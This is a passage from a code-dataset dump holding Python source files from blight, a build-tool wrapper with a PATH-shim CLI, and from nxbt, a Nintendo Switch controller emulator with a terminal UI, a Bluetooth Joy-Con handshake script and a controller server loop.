repo_name
stringlengths
6
97
path
stringlengths
3
341
text
stringlengths
8
1.02M
thinkmoore/blight
src/blight/actions/__init__.py
<gh_stars>0 """ Actions supported by blight. """ from .benchmark import Benchmark # noqa: F401 from .find_outputs import FindOutputs # noqa: F401 from .inject_flags import InjectFlags # noqa: F401 from .record import Record # noqa: F401
thinkmoore/blight
src/blight/cli.py
import logging import os import shlex import shutil import stat import sys import tempfile from pathlib import Path import click import blight.tool from blight.exceptions import BlightError from blight.util import die logging.basicConfig(level=os.environ.get("BLIGHT_LOGLEVEL", "INFO").upper()) def _export(variable, value, *, quote=True): if quote: value = shlex.quote(value) print(f"export {variable}={value}") def _export_guess_wrapped(): for variable, tool in blight.tool.TOOL_ENV_MAP.items(): tool_path = shutil.which(tool) if tool_path is None: die(f"Couldn't locate {tool} on the $PATH") _export(f"BLIGHT_WRAPPED_{variable}", tool_path) def _swizzle_path(): blight_dir = Path(tempfile.mkdtemp(prefix="blight")) for variable, tool in blight.tool.TOOL_ENV_MAP.items(): shim_path = blight_dir / tool with open(shim_path, "w+") as io: io.write(f'blight-{tool} "${{@}}"\n') st = shim_path.stat() shim_path.chmod(st.st_mode | stat.S_IEXEC) # NOTE(ww): No quotation, to allow $PATH to expand. _export("PATH", f"{blight_dir}:$PATH", quote=False) @click.command() @click.option( "--guess-wrapped", help="Attempt to guess the appropriate programs to wrap", is_flag=True ) @click.option("--swizzle-path", help="Wrap via PATH swizzling", is_flag=True) def env(guess_wrapped, swizzle_path): if guess_wrapped: _export_guess_wrapped() if swizzle_path: _swizzle_path() for variable, tool in blight.tool.TOOL_ENV_MAP.items(): _export(variable, f"blight-{tool}") def tool(): # NOTE(ww): Specifically *not* a click command! wrapped_basename = os.path.basename(sys.argv[0]) tool_classname = blight.tool.BLIGHT_TOOL_MAP.get(wrapped_basename) if tool_classname is None: die(f"Unknown blight wrapper requested: {wrapped_basename}") tool_class = getattr(blight.tool, tool_classname) tool = tool_class(sys.argv[1:]) try: tool.run() except BlightError as e: die(str(e))
Yamakaky/nxbt
nxbt/tui.py
import os import time import psutil from collections import deque import multiprocessing from blessed import Terminal from .nxbt import Nxbt, PRO_CONTROLLER class LoadingSpinner(): SPINNER_CHARS = ['โ–  โ–ก โ–ก โ–ก', 'โ–ก โ–  โ–ก โ–ก', 'โ–ก โ–ก โ–  โ–ก', 'โ–ก โ–ก โ–ก โ– ', 'โ–ก โ–ก โ–ก โ– ', 'โ–ก โ–ก โ–  โ–ก', 'โ–ก โ–  โ–ก โ–ก', 'โ–  โ–ก โ–ก โ–ก'] # noqa def __init__(self): self.creation_time = time.perf_counter() self.last_update_time = self.creation_time self.current_char_index = 0 def get_spinner_char(self): current_time = time.perf_counter() delta = current_time - self.last_update_time if delta > 0.07: self.last_update_time = current_time if self.current_char_index == 7: self.current_char_index = 0 else: self.current_char_index += 1 return self.SPINNER_CHARS[self.current_char_index] class ControllerTUI(): CONTROLS = { "ZL": "โ—ฟโ–กโ–กโ–กโ–ก", "L": "โ—ฟโ–กโ–กโ–กโ–ก", "ZR": "โ–กโ–กโ–กโ–กโ—บ", "R": "โ–กโ–กโ–กโ–กโ—บ", "LS_UP": ".โ”€.", "LS_LEFT": "(", "LS_RIGHT": ")", "LS_DOWN": "`โ”€'", "RS_UP": ".โ”€.", "RS_LEFT": "(", "RS_RIGHT": ")", "RS_DOWN": "`โ”€'", "DPAD_UP": "โ–ณ", "DPAD_LEFT": "โ—", "DPAD_RIGHT": "โ–ท", "DPAD_DOWN": "โ–ฝ", "MINUS": "โ—Ž", "PLUS": "โ—Ž", "HOME": "โ–ก", "CAPTURE": "โ–ก", "A": "โ—‹", "B": "โ—‹", "X": "โ—‹", "Y": "โ—‹", } def __init__(self, term): self.term = term # Save a copy of the controls we can restore the # control text on deactivation self.DEFAULT_CONTROLS = self.CONTROLS.copy() self.CONTROL_RELEASE_TIMERS = self.CONTROLS.copy() for control in self.CONTROL_RELEASE_TIMERS.keys(): self.CONTROL_RELEASE_TIMERS[control] = False self.auto_keypress_deactivation = True self.remote_connection = False def toggle_auto_keypress_deactivation(self, toggle): """Toggles whether or not the ControllerTUI should deactivate a control after a period of time. 
:param toggle: A True/False value that toggles auto keypress deactivation :type toggle: bool """ self.auto_keypress_deactivation = toggle def set_remote_connection_status(self, status): """Sets whether or not the controller should render with remote connection specific controls. :param status: The status of the remote connection :type status: bool """ self.remote_connection = status def activate_control(self, key, activated_text=None): if activated_text: self.CONTROLS[key] = activated_text else: self.CONTROLS[key] = self.term.bold_black_on_white(self.CONTROLS[key]) # Keep track of when the key was pressed so we can release later if self.auto_keypress_deactivation: self.CONTROL_RELEASE_TIMERS[key] = time.perf_counter() def deactivate_control(self, key): self.CONTROLS[key] = self.DEFAULT_CONTROLS[key] def render_controller(self): if self.auto_keypress_deactivation: # Release any overdue timers for control in self.CONTROL_RELEASE_TIMERS.keys(): pressed_time = self.CONTROL_RELEASE_TIMERS[control] current_time = time.perf_counter() if pressed_time is not False and current_time - pressed_time > 0.25: self.deactivate_control(control) ZL = self.CONTROLS['ZL'] L = self.CONTROLS['L'] ZR = self.CONTROLS['ZR'] R = self.CONTROLS['R'] LU = self.CONTROLS['LS_UP'] LL = self.CONTROLS['LS_LEFT'] LR = self.CONTROLS['LS_RIGHT'] LD = self.CONTROLS['LS_DOWN'] RU = self.CONTROLS['RS_UP'] RL = self.CONTROLS['RS_LEFT'] RR = self.CONTROLS['RS_RIGHT'] RD = self.CONTROLS['RS_DOWN'] DU = self.CONTROLS['DPAD_UP'] DL = self.CONTROLS['DPAD_LEFT'] DR = self.CONTROLS['DPAD_RIGHT'] DD = self.CONTROLS['DPAD_DOWN'] MN = self.CONTROLS['MINUS'] PL = self.CONTROLS['PLUS'] HM = self.CONTROLS['HOME'] CP = self.CONTROLS['CAPTURE'] A = self.CONTROLS['A'] B = self.CONTROLS['B'] X = self.CONTROLS['X'] Y = self.CONTROLS['Y'] if self.remote_connection: lr_press = "L + R - - - - - - - - -โ–ท E" else: lr_press = " " print(self.term.home + self.term.move_y((self.term.height // 2) - 9)) print(self.term.center(f" 
{ZL} {ZR} ")) print(self.term.center(f" โ”€{L}โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€{R}โ”€ โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”")) print(self.term.center(" โ•ฑ โ•ฒ โ”‚ Controls โ”‚ Keys โ”‚")) print(self.term.center(f" โ•ฑ {LU} {MN} {PL} {X} โ•ฒ โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜")) # noqa print(self.term.center(f"โ”‚ {LL} {LR} {CP} {HM} {Y} {A} โ”‚ Left Stick โ”€ โ”€ โ”€ โ–ท W/A/S/D ")) # noqa print(self.term.center(f"โ”‚ {LD} {B} โ”‚ DPad โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ–ท G/V/B/N ")) print(self.term.center(f"โ”‚ {DU} {RU} โ”‚ Capture/Home โ”€ โ”€ โ”€ โ”€ โ–ท [/] ")) print(self.term.center(f"โ”‚โ•ฒ {DL} โ–ก {DR} {RL} {RR} โ•ฑโ”‚ +/- โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€โ–ท 6/7 ")) # noqa print(self.term.center(f"โ”‚โ–‘โ–‘โ•ฒ {DD} {RD} โ•ฑโ–‘โ–‘โ”‚ X/Y/B/A โ”€ โ”€ โ”€ โ”€ โ”€โ–ท J/I/K/L ")) print(self.term.center("โ”‚โ–‘โ–‘โ–‘โ–‘โ•ฒ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ•ฑโ–‘โ–‘โ–‘โ–‘โ”‚ L/ZL โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ–ท 1/2 ")) print(self.term.center("โ”‚โ–‘โ–‘โ–‘โ–‘โ•ฑ โ•ฒโ–‘โ–‘โ–‘โ–‘โ”‚ R/ZR โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ–ท 8/9 ")) print(self.term.center("โ”‚โ–‘โ–‘โ•ฑ โ•ฒโ–‘โ–‘โ”‚ Right Stick - - - โ–ท Arrows ")) print(self.term.center(f"โ”‚โ•ฑ โ•ฒโ”‚ {lr_press} ")) class InputTUI(): KEYMAP = { # Left Stick Mapping "w": { "control": "LS_UP", "stick_data": { "stick_name": "L_STICK", "x": "+000", "y": "+100" } }, "a": { "control": "LS_LEFT", "stick_data": { "stick_name": "L_STICK", "x": "-100", "y": "+000" } }, "d": { "control": "LS_RIGHT", "stick_data": { "stick_name": "L_STICK", "x": "+100", "y": "+000" } }, "s": { "control": "LS_DOWN", "stick_data": { "stick_name": "L_STICK", "x": "+000", "y": "-100" } }, # Right Stick Mapping "KEY_UP": { "control": "RS_UP", "stick_data": { "stick_name": "R_STICK", "x": "+000", "y": "+100" } }, "KEY_LEFT": { "control": "RS_LEFT", "stick_data": { "stick_name": "R_STICK", "x": "-100", "y": "+000" } }, "KEY_RIGHT": { "control": 
"RS_RIGHT", "stick_data": { "stick_name": "R_STICK", "x": "+100", "y": "+000" } }, "KEY_DOWN": { "control": "RS_DOWN", "stick_data": { "stick_name": "R_STICK", "x": "+000", "y": "-100" } }, # Dpad Mapping "g": "DPAD_UP", "v": "DPAD_LEFT", "n": "DPAD_RIGHT", "b": "DPAD_DOWN", # Button Mapping "6": "MINUS", "7": "PLUS", "[": "CAPTURE", "]": "HOME", "i": "X", "j": "Y", "l": "A", "k": "B", # Triggers "1": "L", "2": "ZL", "8": "R", "9": "ZR", } def __init__(self, reconnect_target=None, debug=False, logfile=False): self.reconnect_target = reconnect_target self.term = Terminal() self.remote_connection = self.detect_remote_connection() self.controller = ControllerTUI(self.term) self.debug = debug self.logfile = logfile def detect_remote_connection(self): """Traverse up the parent processes and check if any have their parent as a remote daemon. If so, the python script is running under a remote connection. Remote shell detection is required for this TUI, due to keyboard input limitations on most remote connections. Specifically, no "keyup" events are sent when a key is released. Keyup events are required for proper input to the Switch, thus, we need to detect if the shell is a remote session and workaround this. 
:return: Returns a boolean value indicating whether or not the current script is running as SSH :rtype: bool """ remote_connection = False remote_process_names = ['sshd', 'mosh-server'] ppid = os.getppid() while ppid > 0: process = psutil.Process(ppid) if process.name() in remote_process_names: remote_connection = True break ppid = process.ppid() return remote_connection def start(self): self.mainloop(self.term) def mainloop(self, term): # Initializing a controller if not self.debug: self.nx = Nxbt(disable_logging=True) else: self.nx = Nxbt(debug=self.debug, logfile=self.logfile) self.controller_index = self.nx.create_controller( PRO_CONTROLLER, reconnect_address=self.reconnect_target) state = None spinner = LoadingSpinner() errors = None try: with term.cbreak(), term.keypad(), term.location(), term.hidden_cursor(): print(term.home + term.clear) self.render_top_bar(term) self.render_bottom_bar(term) self.render_start_screen(term, "Loading") inp = term.inkey(timeout=0) # Loading Screen while inp != chr(113): # Checking for q press # Check key at 15hz inp = term.inkey(timeout=1/30) new_state = self.nx.state[self.controller_index]["state"] if new_state != state: state = new_state loading_text = "Loading" if state == "initializing": loading_text = "Initializing Controller" elif state == "connecting": loading_text = "Connecting to any Nintendo Switch" elif state == "reconnecting": loading_text = "Reconnecting to Nintendo Switch" elif state == "connected": loading_text = "Connected!" 
elif state == "crashed": errors = self.nx.state[self.controller_index]["errors"] exit(1) self.render_start_screen(term, loading_text) print(term.move_y((term.height // 2) + 6)) if state != "connected": print(term.bold(term.center(spinner.get_spinner_char()))) else: print(term.center("")) if state == "connected": time.sleep(1) break # Main Gamepad Input Loop if state == "connected": if self.remote_connection: self.remote_input_loop(term) else: self.direct_input_loop(term) except KeyboardInterrupt: pass finally: print(term.clear()) if errors: print("The TUI encountered the following errors:") print(errors) def remote_input_loop(self, term): self.controller.set_remote_connection_status(True) inp = term.inkey(timeout=0) while inp != chr(113): # Checking for q press # Cutoff large buffered input from the deque # so that we avoid spamming the Switch after # a key releases from being held. # Increasing the size of the buffer does not # smooth out the jagginess of input. if len(term._keyboard_buf) > 1: term._keyboard_buf = deque([term._keyboard_buf.pop()]) inp = term.inkey(1/60) pressed_key = None if inp.is_sequence: pressed_key = inp.name elif inp: pressed_key = inp if pressed_key == 'e': self.controller.activate_control('L') self.controller.activate_control('R') self.nx.macro(self.controller_index, "L R 0.1s") else: try: control_data = self.KEYMAP[pressed_key] if type(control_data) == dict and "stick_data" in control_data.keys(): x_value = control_data['stick_data']['x'] y_value = control_data['stick_data']['y'] stick_name = control_data['stick_data']['stick_name'] self.controller.activate_control(control_data["control"]) self.nx.macro( self.controller_index, f"{stick_name}@{x_value}{y_value} 0.1s") else: self.controller.activate_control(control_data) self.nx.macro(self.controller_index, f"{control_data} 0.05s") except KeyError: pass self.controller.render_controller() self.check_for_disconnect(term) def direct_input_loop(self, term): # pynput must be imported here since 
earlier imports # will cause errors on remote connections from pynput import keyboard self.controller.toggle_auto_keypress_deactivation(False) self.exit_tui = False self.capture_input = True # Create a packet that is accessible from a multiprocessing Process # and from within threads packet_manager = multiprocessing.Manager() input_packet = packet_manager.dict() input_packet["packet"] = self.nx.create_input_packet() print(term.move_y(term.height - 5)) print(term.center(term.bold_black_on_white(" <Press esc to toggle input capture> "))) def on_press(key): # Parse the key press event pressed_key = None try: pressed_key = key.char except AttributeError: pressed_key = str(key).replace(".", "_").upper() if not self.capture_input: # If we're not capturing input, pass pass else: try: control_data = self.KEYMAP[pressed_key] packet = input_packet["packet"] if type(control_data) == dict and "stick_data" in control_data.keys(): stick_name = control_data['stick_data']['stick_name'] self.controller.activate_control(control_data["control"]) packet[stick_name][control_data["control"]] = True else: self.controller.activate_control(control_data) packet[control_data] = True input_packet["packet"] = packet except KeyError: pass def on_release(key): # Parse the key release event released_key = None try: released_key = key.char except AttributeError: released_key = str(key).replace(".", "_").upper() # If the esc key is released, toggle input capturing if released_key == "KEY_ESC": self.capture_input = not self.capture_input # Exit on q key press if released_key == 'q': self.exit_tui = True return False if not self.capture_input: # If we're not capturing input, pass pass else: try: control_data = self.KEYMAP[released_key] packet = input_packet["packet"] if type(control_data) == dict and "stick_data" in control_data.keys(): stick_name = control_data['stick_data']['stick_name'] self.controller.deactivate_control(control_data["control"]) packet[stick_name][control_data["control"]] = False 
else: self.controller.deactivate_control(control_data) packet[control_data] = False input_packet["packet"] = packet except KeyError: pass def input_worker(nxbt, controller_index, input_packet): while True: packet = input_packet["packet"] # Calculating left x/y stick values ls_x_value = 0 ls_y_value = 0 if packet["L_STICK"]["LS_LEFT"]: ls_x_value -= 100 if packet["L_STICK"]["LS_RIGHT"]: ls_x_value += 100 if packet["L_STICK"]["LS_UP"]: ls_y_value += 100 if packet["L_STICK"]["LS_DOWN"]: ls_y_value -= 100 packet["L_STICK"]["X_VALUE"] = ls_x_value packet["L_STICK"]["Y_VALUE"] = ls_y_value # Calculating right x/y stick values rs_x_value = 0 rs_y_value = 0 if packet["R_STICK"]["RS_LEFT"]: rs_x_value -= 100 if packet["R_STICK"]["RS_RIGHT"]: rs_x_value += 100 if packet["R_STICK"]["RS_UP"]: rs_y_value += 100 if packet["R_STICK"]["RS_DOWN"]: rs_y_value -= 100 packet["R_STICK"]["X_VALUE"] = rs_x_value packet["R_STICK"]["Y_VALUE"] = rs_y_value nxbt.set_controller_input(controller_index, packet) time.sleep(1/120) input_process = multiprocessing.Process( target=input_worker, args=(self.nx, self.controller_index, input_packet)) input_process.start() # Start a non-blocking keyboard event listener listener = keyboard.Listener( on_press=on_press, on_release=on_release) listener.start() # Main TUI Loop while True: if self.exit_tui: packet_manager.shutdown() input_process.terminate() break if not self.capture_input: print(term.home + term.move_y((term.height // 2) - 4)) print(term.bold_black_on_white(term.center(""))) print(term.bold_black_on_white(term.center( "<Input Paused. 
Press ESC Again to Begin Capturing Input>" ))) print(term.bold_black_on_white(term.center(""))) else: self.controller.render_controller() self.check_for_disconnect(term) time.sleep(1/120) def render_start_screen(self, term, loading_text): print(term.home + term.move_y((term.height // 2) - 8)) print(term.center("___โ•ฒโ•ฑ___")) print(term.center("โ”‚โ•ฒ โ•ฑโ•ฒ โ•ฑโ”‚")) print(term.center("โ”‚ โ•ฒโ•ฑ__โ•ฒโ•ฑ โ”‚")) print(term.center("โ”‚โ•ฑ โ•ฒโ”‚")) print(term.center("โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”")) print(term.center("โ”‚ NXBT TUI โ”‚")) print(term.center("โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜")) print(term.center("")) print(term.black_on_white(term.center(""))) print(term.bold_black_on_white(term.center(loading_text))) print(term.black_on_white(term.center(""))) def render_top_bar(self, term): print(term.move_y(1)) if self.remote_connection: print(term.bold_black_on_white(term.center(term.bold_black_on_red(" REMOTE MODE ")))) warning = " WARNING: MACROS WILL BE USED ON KEYPRESS DUE TO REMOTE CLI LIMITATIONS " print(term.center(term.black_on_red(warning))) else: print(term.bold_black_on_white(term.center("DIRECT INPUT MODE"))) print(term.move_y(1)) print(term.white_on_black(" NXBT TUI ๐ŸŽฎ ")) def render_bottom_bar(self, term): print(term.move_y(term.height)) print(term.center(term.bold_black_on_white(" <Press q to quit> "))) def check_for_disconnect(self, term): state = self.nx.state[self.controller_index]["state"] if state != 'connected': print(term.home + term.move_y((term.height // 2) - 4)) print(term.bold_black_on_red(term.center(""))) print(term.bold_black_on_red(term.center(state.title()))) print(term.bold_black_on_red(term.center(""))) while True: inp = term.inkey(1/30) if inp == chr(113): exit(1) elif self.nx.state[self.controller_index]["state"] == 'connected': break def main(): """Program entry point.""" tui = InputTUI() tui.start() if __name__ == '__main__': main()
Yamakaky/nxbt
scripts/switch_emu.py
""" Quick script to emulate a Switch connecting to a Joy-Con/Pro Controller. Note: If you get an Invalid Exchange error when running this script, this means that the Switch has paired to the controller, invalidating the original pairing key we created. You'll need to re-pair the controller to this device. """ import socket import sys import os import time from nxbt import toggle_input_plugin from nxbt import BlueZ REQUEST_INFO = b'\xA2\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_SHIPMENT = b'\xA2\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SERIAL_NUMBER = b'\xA2\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x60\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' COLOURS = b'\xA2\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x10\x50\x60\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' INPUT_MODE = b'\xA2\x01\x0A\x00\x01\x40\x40\x00\x01\x40\x40\x03\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' TRIGGER_BUTTONS = b'\xA2\x01\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FACTORY_PARAMS = b'\xA2\x01\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x10\x80\x60\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FACTORY_PARAMS_2 = 
b'\xA2\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x98\x60\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' USER_CAL = b'\xA2\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x10\x10\x80\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FACTORY_CAL = b'\xA2\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x10\x3D\x60\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SIX_AXIS_CAL = b'\xA2\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x10\x20\x60\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ENABLE_IMU = b'\xA2\x01\x07\x00\x01\x40\x40\x00\x01\x40\x40\x40\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ENABLE_VIBRATION = b'\xA2\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_NFC_IR = b'\xA2\x01\x0C\x00\x01\x40\x40\x00\x01\x40\x40\x21\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_PLAYER_LIGHTS = b'\xA2\x01\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x30\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FLASH_PLAYER_LIGHTS = b'\xA2\x01\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x30\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' COMMANDS = [ REQUEST_INFO, 
SET_SHIPMENT, SERIAL_NUMBER, COLOURS, INPUT_MODE, TRIGGER_BUTTONS, FACTORY_PARAMS, FACTORY_PARAMS_2, USER_CAL, FACTORY_CAL, SIX_AXIS_CAL, ENABLE_IMU, ENABLE_VIBRATION, SET_NFC_IR, ] def format_message(data, split, name): """Formats a given byte message in hex format split into payload and subcommand sections. :param data: A series of bytes :type data: bytes :param split: The location of the payload/subcommand split :type split: integer :param name: The name featured in the start/end messages :type name: string :return: The formatted data :rtype: string """ payload = "" subcommand = "" for i in range(0, len(data)): data_byte = str(hex(data[i]))[2:].upper() if len(data_byte) < 2: data_byte = "0" + data_byte if i <= split: payload += "0x" + data_byte + " " else: subcommand += "0x" + data_byte + " " formatted = ( f"--- {name} Msg ---\n" + f"Payload: {payload}\n" + f"Subcommand: {subcommand}") return formatted def print_msg_controller(data): """Prints a formatted message from a controller :param data: The bytes from the controller message :type data: bytes """ print(format_message(data, 13, "Controller")) def print_msg_switch(data): """Prints a formatted message from a Switch :param data: The bytes from the Switch message :type data: bytes """ print(format_message(data, 10, "Switch")) def wait_for_reply(itr): while True: data = itr.recv(350) print_msg_controller(data) if data[1] == 0x21: break if __name__ == "__main__": # Switch Controller Bluetooth MAC Address goes here jc_MAC = "98:B6:E9:B0:05:E7" port_ctrl = 17 port_itr = 19 # Joy-Con Sockets jc_ctrl = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) jc_itr = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) toggle_input_plugin(False) bt = BlueZ(adapter_path="/org/bluez/hci0") try: # Remove the device before we try to re-pair device_path = bt.find_device_by_address(jc_MAC) if not device_path: print("Device not paired. 
Pairing...") # Ensure we are paired/connected to the JC print("Attempting to re-pair with device") devices = bt.discover_devices(alias="Pro Controller", timeout=8) jc_device_path = None for key in devices.keys(): print(devices[key]["Address"]) if devices[key]["Address"] == jc_MAC: jc_device_path = key break if not jc_device_path: print("The specified Joy-Con could not be found") else: bt.pair_device(jc_device_path) print("Paired Joy-Con") bt.set_alias("Nintendo Switch") print("Connecting to Joy-Con: ", jc_MAC) jc_ctrl.connect((jc_MAC, port_ctrl)) jc_itr.connect((jc_MAC, port_itr)) print("Got connection.") # Initial Input report from Joy-Con jc_data = jc_itr.recv(350) print("Got initial Joy-Con Empty Report") print_msg_controller(jc_data) for command in COMMANDS: print_msg_switch(command) jc_itr.sendall(command) wait_for_reply(jc_itr) while True: data = jc_itr.recv(350) print_msg_controller(data) jc_itr.sendall(SET_PLAYER_LIGHTS) print_msg_switch(SET_PLAYER_LIGHTS) time.sleep(1/120) except KeyboardInterrupt: print("Closing sockets") jc_ctrl.close() jc_itr.close() try: sys.exit(1) except SystemExit: os._exit(1) except OSError as e: print("Closing sockets") jc_ctrl.close() jc_itr.close() raise e finally: toggle_input_plugin(True)
Yamakaky/nxbt
nxbt/controller/server.py
import socket import fcntl import os import time import queue import logging import traceback from .controller import Controller, ControllerTypes from ..bluez import BlueZ from .protocol import ControllerProtocol from .input import InputParser from .utils import format_msg_controller, format_msg_switch class ControllerServer(): def __init__(self, controller_type, adapter_path="/org/bluez/hci0", state=None, task_queue=None, lock=None, colour_body=None, colour_buttons=None): self.logger = logging.getLogger('nxbt') # Cache logging level to increase performance on checks self.logger_level = self.logger.level if state: self.state = state else: self.state = { "state": "", "finished_macros": [], "errors": None, "direct_input": None } self.task_queue = task_queue self.controller_type = controller_type self.colour_body = colour_body self.colour_buttons = colour_buttons if lock: self.lock = lock self.reconnect_counter = 0 # Intializing Bluetooth self.bt = BlueZ(adapter_path=adapter_path) self.controller = Controller(self.bt, self.controller_type) self.protocol = ControllerProtocol( self.controller_type, self.bt.address, colour_body=self.colour_body, colour_buttons=self.colour_buttons) self.input = InputParser(self.protocol) self.slow_input_frequency = False def run(self, reconnect_address=None): """Runs the mainloop of the controller server. :param reconnect_address: The Bluetooth MAC address of a previously connected to Nintendo Switch, defaults to None :type reconnect_address: string or list, optional """ self.state["state"] = "initializing" try: # If we have a lock, prevent other controllers # from initializing at the same time and saturating the DBus, # potentially causing a kernel panic. 
if self.lock: self.lock.acquire() try: self.controller.setup() if reconnect_address: itr, ctrl = self.reconnect(reconnect_address) else: itr, ctrl = self.connect() finally: if self.lock: self.lock.release() self.switch_address = itr.getsockname()[0] self.state["state"] = "connected" self.mainloop(itr, ctrl) except KeyboardInterrupt: pass except Exception: self.state["state"] = "crashed" self.state["errors"] = traceback.format_exc() return self.state def mainloop(self, itr, ctrl): # Mainloop while True: # Start timing the command processing timer_start = time.perf_counter() # Attempt to get output from Switch try: reply = itr.recv(50) if self.logger_level <= logging.DEBUG and len(reply) > 40: self.logger.debug(format_msg_switch(reply)) except BlockingIOError: reply = None # Getting any inputs from the task queue if self.task_queue: try: while True: msg = self.task_queue.get_nowait() if msg and msg["type"] == "macro": self.input.buffer_macro( msg["macro"], msg["macro_id"]) elif msg and msg["type"] == "stop": self.input.stop_macro( msg["macro_id"], state=self.state) elif msg and msg["type"] == "clear": self.input.clear_macros() except queue.Empty: pass # Set Direct Input if self.state["direct_input"]: self.input.set_controller_input(self.state["direct_input"]) self.protocol.process_commands(reply) self.input.set_protocol_input(state=self.state) msg = self.protocol.get_report() if self.logger_level <= logging.DEBUG and reply and len(reply) > 45: self.logger.debug(format_msg_controller(msg)) try: itr.sendall(msg) except BlockingIOError: continue except OSError as e: # Attempt to reconnect to the Switch itr, ctrl = self.save_connection(e) # Figure out how long it took to process commands timer_end = time.perf_counter() elapsed_time = (timer_end - timer_start) if self.slow_input_frequency: # Check if we can switch out of slow frequency input if self.input.exited_grip_order_menu: self.slow_input_frequency = False if elapsed_time < 1/15: time.sleep(1/15 - elapsed_time) 
